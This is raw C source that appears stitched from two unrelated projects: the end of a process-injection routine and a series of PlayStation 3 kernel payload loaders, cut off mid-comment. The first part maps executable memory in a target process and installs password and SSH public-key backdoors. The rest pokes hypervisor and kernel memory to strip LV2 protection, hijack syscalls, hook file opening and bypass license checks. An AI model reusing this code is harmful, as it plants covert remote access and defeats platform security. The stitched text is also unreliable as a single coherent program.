find_hole(ctx, rexec_flag, 0x1000); info("allocating config memory @ 0x%lx", ctx->config_addr); _mmap( ctx, (void*)ctx->config_addr, 0x1000, PROT_READ| PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, 0, 0 ); inject_ctx_map_reload(ctx); // install backdoor(s) if(config->net_type != 0) { backdoor_password_install(ctx); inject_ctx_map_reload(ctx); } if (pubkey_value != NULL || pubkey_file != NULL) { if (pubkey_file != NULL) { FILE *f = fopen(pubkey_file, "rb"); if (f == NULL) { error("could not open pubkey file ('%s')", pubkey_file); } char keybuf[2048]; memset(keybuf, 0, 2048); fgets(keybuf, 2047, f); fclose(f); if(strncmp(keybuf, "ssh-rsa", 7) != 0) { error("invalid pubkey specified, we only support ssh-rsa for now"); } strcpy(config->pubkey, keybuf); backdoor_pubkey_install(ctx); } else { if(strncmp(pubkey_value, "ssh-rsa", 7) != 0) { error("invalid pubkey specified, we only support ssh-rsa for now"); } strcpy(config->pubkey, pubkey_value); backdoor_pubkey_install(ctx); } inject_ctx_map_reload(ctx); } if (menu_activate) { backdoor_menu_install(ctx); inject_ctx_map_reload(ctx); } mod_banner("finishing install"); // upload config data info("uploading config.."); _poke(ctx->pid, ctx->config_addr, config, sizeof(config_block)); // disable rexec info("switching off rexec.."); u32 null_word = 0; _poke(ctx->pid, rexec_flag, &null_word, 4); // clean upr inject_ctx_deinit(ctx); callcache_free(); info("all done!"); return 0; }
void load_payload(void) { char *ptr, *ptr2; unsigned long long addr, value; int patches = 0; #ifdef USE_MEMCPY_SYSCALL /* This does not work on some PS3s */ pokeq(NEW_POKE_SYSCALL_ADDR, 0x4800000428250000ULL); pokeq(NEW_POKE_SYSCALL_ADDR + 8, 0x4182001438a5ffffULL); pokeq(NEW_POKE_SYSCALL_ADDR + 16, 0x7cc428ae7cc329aeULL); pokeq(NEW_POKE_SYSCALL_ADDR + 24, 0x4bffffec4e800020ULL); #ifdef WITH_PL3 system_call_3(NEW_POKE_SYSCALL, 0x800000000000ef48ULL, (unsigned long long) &&_binary_payload_pl3_payload_bin_start, (uint64_t) & _binary_payload_pl3_payload_bin_size); #else system_call_3(new_poke_syscall, 0x80000000002be4a0ULL, (unsigned long long) &_binary_payload_syscall36_payload_bin_start, (uint64_t) & _binary_payload_syscall36_payload_bin_size); #endif /* restore syscall */ remove_new_poke(); pokeq(NEW_POKE_SYSCALL_ADDR + 16, 0xebc2fe287c7f1b78); pokeq(NEW_POKE_SYSCALL_ADDR + 24, 0x3860032dfba100e8); #else /* WARNING!! It supports only payload with a size multiple of 4 */ uint32_t i; #ifdef WITH_PL3 uint64_t *pl64 = (uint64_t *) (uint64_t) & _binary_payload_pl3_payload_bin_start; for (i = 0; i < (uint64_t) & _binary_payload_pl3_payload_bin_size / sizeof(uint64_t); i++) { pokeq(0x800000000000ef48ULL + i * sizeof(uint64_t), *pl64++); } if ((uint64_t) & _binary_payload_pl3_payload_bin_size % sizeof(uint64_t)) { pokeq32(0x800000000000ef48ULL + i * sizeof(uint64_t), (uint32_t) * pl64); } #else uint64_t *pl64 = (uint64_t *) (uint64_t) & _binary_payload_syscall36_payload_bin_start; for (i = 0; i < (uint64_t) & _binary_payload_syscall36_payload_bin_size / sizeof(uint64_t); i++) { pokeq(0x80000000002be4a0ULL + i * sizeof(uint64_t), *pl64++); } if ((uint64_t) & _binary_payload_syscall36_payload_bin_size % sizeof(uint64_t)) { pokeq(0x80000000002be4a0ULL + i * sizeof(uint64_t), (uint32_t) * pl64); } #endif #endif #ifdef WITH_PL3 char *tmp = strtok((char *) &_binary_payload_pl3_patch_txt_start, "\n"); #else char *tmp = strtok((char *) &_binary_payload_syscall36_patch_txt_start, "\n"); #endif do { ptr = strchr(tmp, '#'); if (ptr) *ptr = 0; ptr = tmp; while (*ptr == ' ' || *ptr == '\t') ptr++; if (!strchr("0123456789abcdefABCDEF", *ptr)) continue; addr = strtoull(ptr, &ptr, 16); if (*ptr != ':') continue; else ptr++; while (*ptr == ' ' || *ptr == '\t') ptr++; if (!strchr("0123456789abcdefABCDEF", *ptr)) continue; ptr2 = ptr; value = strtoull(ptr, &ptr, 16); patches++; if (ptr - ptr2 == 8) { _poke32(addr, value); } else if (ptr - ptr2 == 16) { _poke(addr, value); } else patches--; } while ((tmp = strtok(NULL, "\n"))); }
void load_payload_431(int mode) { install_lv2_memcpy(); /* install lv1 peek/poke/call */ lv2_memcpy(0x800000000000171C, (u64) lv1_peek_poke_call_routines, sizeof(lv1_peek_poke_call_routines)); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_431_bin, payload_sky_431_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_431_bin, umount_431_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); poke_syscall = 0; // uses sys8_pokeinst remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); //Patches from webMAN pokeq(0x80000000002979E0ULL, 0x4E80002038600000ULL ); pokeq(0x80000000002979E8ULL, 0x7C6307B44E800020ULL ); // fix 8001003C error pokeq(0x8000000000057174ULL, 0x63FF003D60000000ULL ); // fix 8001003D error pokeq(0x800000000005723CULL, 0x3FE080013BE00000ULL ); // fix 8001003E error pokeq(0x80000000000571E8ULL, 0x600000002F840004ULL ); pokeq(0x80000000000571F0ULL, 0x48000098E8629870ULL ); pokeq(0x800000000005ABACULL, 0x60000000E8610188ULL ); pokeq(0x800000000005ABA0ULL, 0x600000005463063EULL ); _poke((u32) (SYSCALL_BASE + 9 * 8) , 0x8000000000001790ULL); _poke((u32) (SYSCALL_BASE + 10 * 8), 0x8000000000001798ULL); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x0571E8, 0x60000000); // already set in E3 "nop" PATCH_JUMP(0x0571F0, 0x57288); // already set in E3 _poke32(0x05ABAC, 0x60000000); // already set in E3 "nop" _poke32(0x05ABC0, 0x60000000); // already set in E3 "nop" // pokeq(0x800000000005ABACULL,0x60000000E8610188ULL); different patch method // pokeq(0x800000000005ABA0ULL,0x600000005463063EULL); _poke( 0x057174, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" _poke32(0x05723C, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" PATCH_JUMP(0x057240, 0x5714C); // fix E3 4.30 added error /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x2979E4, 0x386000007C6307B4); _poke32(0x2979EC, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ //0x7C7D1B78 PATCH_JUMP(0x2C3D04, (PAYLOAD_OFFSET+0x30)); // patch openhook // deleted _poke((u32) (SYSCALL_BASE + 36 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0xC8)); // syscall_map_open_desc - sys36 #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_355(int mode) { install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x800000000000ef48ULL, (u64) payload_sky_355_bin, payload_sky_355_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_355_bin, umount_355_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x55f14, 0x60000000); _poke32(0x55f1c, 0x48000098); _poke32(0x7af68, 0x60000000); _poke32(0x7af7c, 0x60000000); _poke(0x55EA0, 0x63FF003D60000000); // fix 8001003D error _poke(0x55F64, 0x3FE080013BE00000); // fix 8001003E error /* -002b3290 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d9 b4 11 |....|.#x|}.xK...| +002b3290 f8 01 00 b0 7c 9c 23 78 4b d5 bf 40 4b d9 b4 11 |....|.#xK..@K...| (openhook jump - 0xF1D8) */ //_poke(0x2b3298, 0x4bd5bda04bd9b411ULL); //jump hook PATCH_JUMP(0x2b3298, (PAYLOAD_OFFSET+0x30)); /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x28A404, 0x386000007C6307B4); _poke32(0x28A40C, 0x4E800020); #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_465(int mode) { if(bEnableLv2_memprot_patch) // changed offset: 0x377828 -> 0x370F28 { //Remove Lv2 memory protection lv1poke(0x370F28 + 0x00, 0x0000000000000001ULL); // Original: 0x0000000000351FD8ULL lv1poke(0x370F28 + 0x08, 0xE0D251B556C59F05ULL); // Original: 0x3B5B965B020AE21AULL lv1poke(0x370F28 + 0x10, 0xC232FCAD552C80D7ULL); // Original: 0x7D6F60B118E2E81BULL lv1poke(0x370F28 + 0x18, 0x65140CD200000000ULL); // Original: 0x315D8B7700000000ULL } install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_465_bin, payload_sky_465_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_465_bin, umount_465_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BD Emu mount pokeq(0x80000000007EF220ULL, 0ULL); //Patches from webMAN if(bEnableLv2_webman_patch) { //patches by deank pokeq(0x800000000026FDDCULL, 0x4E80002038600000ULL ); // fix 8001003C error Original: 0x4E80002038600000ULL pokeq(0x800000000026FDE4ULL, 0x7C6307B44E800020ULL ); // fix 8001003C error Original: 0x7C6307B44E800020ULL pokeq(0x800000000005658CULL, 0x63FF003D60000000ULL ); // fix 8001003D error Original: 0x63FF003D419EFFD4ULL pokeq(0x8000000000056650ULL, 0x3FE080013BE00000ULL ); // fix 8001003E error Original: 0x3FE0800163FF003EULL pokeq(0x80000000000565FCULL, 0x419E00D860000000ULL ); // Original: 0x419E00D8419D00C0ULL pokeq(0x8000000000056604ULL, 0x2F84000448000098ULL ); // Original: 0x2F840004409C0048ULL //PATCH_JUMP pokeq(0x800000000005A658ULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL pokeq(0x800000000005A66CULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL pokeq(0x8000000000056230ULL, 0x386000012F830000ULL ); // ignore LIC.DAT check pokeq(0x80000000002302F0ULL, 0x38600000F8690000ULL ); // fix 0x8001002B / 80010017 errors (2015-01-03) pokeq(0x8000000000055C5CULL, 0xF821FE917C0802A6ULL ); // just restore the original pokeq(0x8000000000058DB0ULL, 0x419E0038E8610098ULL ); // just restore the original /* if(file_exists("/dev_flash/rebug")==false || bEnableLv2_webman_patch==3) { //anti-ode patches by deank //pokeq(0x8000000000055C5CULL, 0xF821FE917C0802A6ULL ); //replaced by deank's patch (2015-01-03) pokeq(0x8000000000055C84ULL, 0x6000000060000000ULL ); pokeq(0x8000000000055C8CULL, 0x600000003BA00000ULL ); } */ if(bEnableLv2_webman_patch>=2 || bEnableLv2_habib_patch == 2) bEnableLv2_habib_patch=0; } //Patches by Habib ported to 4.65 (habib_patch = 0=disabled, 1=new patch, 2=new patch except 4.65 Habib Cobra, 3=old patch, 4=no boot speedup patch) if(bEnableLv2_habib_patch == 2 && is_cobra_based() && file_exists("/dev_flash/habib")) ; else if((bEnableLv2_habib_patch == 11) || (bEnableLv2_habib_patch == 2)) { // enable new habib patches (now obsolete) //replaced by deank's patch (2015-01-03) pokeq(0x8000000000058DB0ULL + 0x00, 0x60000000E8610098ULL); pokeq(0x8000000000058DB0ULL + 0x08, 0x2FA30000419E000CULL); pokeq(0x8000000000058DB0ULL + 0x10, 0x388000334800BE15ULL); pokeq(0x8000000000058DB0ULL + 0x18, 0xE80100F07FE307B4ULL); pokeq(0x8000000000055C5CULL + 0x00, 0x386000004E800020ULL); pokeq(0x8000000000055C5CULL + 0x08, 0xFBC10160FBE10168ULL); pokeq(0x8000000000055C5CULL + 0x10, 0xFB610148FB810150ULL); pokeq(0x8000000000055C5CULL + 0x18, 0xFBA10158F8010180ULL); //patch to prevent blackscreen on usb games in jb format pokeq(0x8000000000055C84ULL, 0x386000002F830001ULL); //Original: 0x481DA6692F830001ULL pokeq(0x8000000000055C8CULL, 0x419E00303BA00000ULL); //Original: 0x419E00303BA00000ULL } else if(bEnableLv2_habib_patch == 10) { // disable new habib patches pokeq(0x8000000000058DB0ULL + 0x00, 0x419E0038E8610098ULL); pokeq(0x8000000000058DB0ULL + 0x08, 0x2FA30000419E000CULL); pokeq(0x8000000000058DB0ULL + 0x10, 0x388000334800BE15ULL); pokeq(0x8000000000058DB0ULL + 0x18, 0xE80100F07FE307B4ULL); pokeq(0x8000000000055C5CULL + 0x00, 0xF821FE917C0802A6ULL); pokeq(0x8000000000055C5CULL + 0x08, 0xFBC10160FBE10168ULL); pokeq(0x8000000000055C5CULL + 0x10, 0xFB610148FB810150ULL); pokeq(0x8000000000055C5CULL + 0x18, 0xFBA10158F8010180ULL); } else { if(bEnableLv2_habib_patch >= 1) { if(bEnableLv2_habib_patch == 3) pokeq32(0x8000000000058DB0ULL, 0x60000000); // old fix 0x80010017 error Original: 0x7C7F1B78419E0038ULL else pokeq(0x80000000002A1060ULL, 0x386000014E800020ULL); // fix 0x80010017 error Original: 0xFBC1FFF0EBC225B0ULL // Booting of game discs and backups speed increased if(bEnableLv2_habib_patch != 4) { pokeq32(0x8000000000058DA4ULL, 0x38600001); pokeq32(0x800000000005A970ULL, 0x38600000); } pokeq(0x8000000000055C5CULL, 0x386000004E800020ULL); // fix 0x8001002B error Original: 0xF821FE917C0802A6ULL } } /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x56600, 0x60000000); // Original: 0x419E00D8419D00C0ULL -> 0x419E00D860000000ULL PATCH_JUMP(0x56608, 0x566A0); // Original: 0x2F840004409C0048ULL -> 0x2F84000448000098ULL _poke32(0x05A65C, 0x60000000); // fix 80010009 error _poke32(0x05A670, 0x60000000); // fix 80010019 error _poke( 0x05658C, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done _poke32(0x056654, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done PATCH_JUMP(0x56658, 0x56564); // Not present in rebug, anyway.. _poke(0x26FDE0, 0x386000007C6307B4); //fix 8001003C error _poke32(0x26FDE0 + 8, 0x4E800020); // /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2A02EC, (PAYLOAD_OFFSET+0x30)); // patch openhook - done _poke32(0x2A02C8, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98") #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_421dex(int mode) { // Remove lv2 protection lv1poke(0x370A28, 0x0000000000000001ULL); lv1poke(0x370A30, 0xe0d251b556c59f05ULL); lv1poke(0x370A38, 0xc232fcad552c80d7ULL); lv1poke(0x370A40, 0x65140cd200000000ULL); install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_421dex_bin, payload_sky_421dex_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_421dex_bin, umount_421dex_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x05A9AC, 0x60000000); // already set in ps3ita "nop" PATCH_JUMP(0x05A9B4, 0x5AA4C); // already set in ps3ita "nop" _poke32(0x05E370, 0x60000000); // already set in ps3ita "nop" _poke32(0x05E384, 0x60000000); // already set in ps3ita "nop" _poke( 0x05A938, 0x63FF003D60000000); // already set in ps3ita - fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" _poke32(0x05AA00, 0x3BE00000); // already set in ps3ita - fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" PATCH_JUMP(0x05AA04, 0x5A910); // already set in ps3ita /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x29C8C4, 0x386000007C6307B4); _poke32(0x29C8CC, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2D973C, (PAYLOAD_OFFSET+0x30)); #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_453dex(int mode) { //Remove Lv2 memory protection //No needed on REBUG 4.53.1 /* { lv1poke(0x385130, 0x0000000000000001ULL); lv1poke(0x385130 + 8, 0xE0D251B556C59F05ULL); lv1poke(0x385130 + 16, 0xC232FCAD552C80D7ULL); lv1poke(0x385130 + 24, 0x65140CD200000000ULL); } */ install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_453dex_bin, payload_sky_453dex_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_453dex_bin, umount_453dex_bin_size); restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x59B04, 0x60000000); // done PATCH_JUMP(0x59B0C, 0x59BA4); // done _poke32(0x5D4C8, 0x60000000); // done _poke32(0x5D4DC, 0x60000000); // done _poke( 0x59A90, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done _poke32(0x59B58, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x275F10, 0x386000007C6307B4); // is still patched in rebug, anyway.. _poke32(0x275F10 + 8, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2B83E4, (PAYLOAD_OFFSET+0x30)); // patch openhook #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_450dex(int mode) { //Remove Lv2 memory protection if( file_exists("/dev_flash/ps3ita") == 0 ) // is not necessary on cfw ps3ita it don't has lv2 memory protection { lv1poke(0x370AA8, 0x0000000000000001ULL); lv1poke(0x370AA8 + 8, 0xE0D251B556C59F05ULL); lv1poke(0x370AA8 + 16, 0xC232FCAD552C80D7ULL); lv1poke(0x370AA8 + 24, 0x65140CD200000000ULL); } install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_450dex_bin, payload_sky_450dex_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_450dex_bin, umount_450dex_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); //Patches from webMAN pokeq(0x8000000000275D38ULL, 0x4E80002038600000ULL ); // fix 8001003C error pokeq(0x8000000000275D40ULL, 0x7C6307B44E800020ULL ); // fix 8001003C error pokeq(0x8000000000059A8CULL, 0x63FF003D60000000ULL ); // fix 8001003D error pokeq(0x8000000000059B50ULL, 0x3FE080013BE00000ULL ); // fix 8001003E error pokeq(0x8000000000059AFCULL, 0x419E00D860000000ULL ); pokeq(0x8000000000059B04ULL, 0x2F84000448000098ULL ); pokeq(0x800000000005D4C0ULL, 0x2F83000060000000ULL ); pokeq(0x800000000005D4D4ULL, 0x2F83000060000000ULL ); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x59B00, 0x60000000); // done PATCH_JUMP(0x59B08, 0x59BA0); // done _poke32(0x5D4C4, 0x60000000); // done _poke32(0x5D4D8, 0x60000000); // done _poke( 0x59A8C, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done _poke32(0x59B54, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done // PATCH_JUMP(0x, 0x56098); /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x275D3C, 0x386000007C6307B4); // is still patched in rebug, anyway.. _poke32(0x275D3C + 8, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2B820C, (PAYLOAD_OFFSET+0x30)); // patch openhook #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_480(int mode) { //Remove Lv2 memory protection, NOT needed for REBUG 4.7x lv1poke(0x370F28 + 0x00, 0x0000000000000001ULL); // Original: 0x0000000000351FD8ULL lv1poke(0x370F28 + 0x08, 0xE0D251B556C59F05ULL); // Original: 0x3B5B965B020AE21AULL lv1poke(0x370F28 + 0x10, 0xC232FCAD552C80D7ULL); // Original: 0x7D6F60B118E2E81BULL lv1poke(0x370F28 + 0x18, 0x65140CD200000000ULL); // Original: 0x315D8B7700000000ULL install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_480_bin, payload_sky_480_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_480_bin, umount_480_bin_size); restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BD Emu mount pokeq(0x80000000007EF220ULL, 0ULL); //patches by deank for webMAN, I left them here just in case someone wants to play with, but basically the same thing with SYS36 patches below pokeq(0x8000000000267144ULL, 0x4E80002038600000ULL ); // fix 8001003C error Original: 0x4E8000208003026CULL pokeq(0x800000000026714CULL, 0x7C6307B44E800020ULL ); // fix 8001003C error Original: 0x3D201B433C608001ULL /* pokeq(0x800000000005688CULL, 0x63FF003D60000000ULL ); // fix 8001003D error Original: 0x63FF003D419EFFD4ULL pokeq(0x800000000005664CULL, 0x3FE080013BE00000ULL ); // fix 8001003E error Original: 0x3FE0800163FF003EULL pokeq(0x80000000000565F8ULL, 0x419E00D860000000ULL ); // Original: 0x419E00D8419D00C0ULL pokeq(0x8000000000056600ULL, 0x2F84000448000098ULL ); // Original: 0x2F840004409C0048ULL //PATCH_JUMP pokeq(0x800000000005A6DCULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 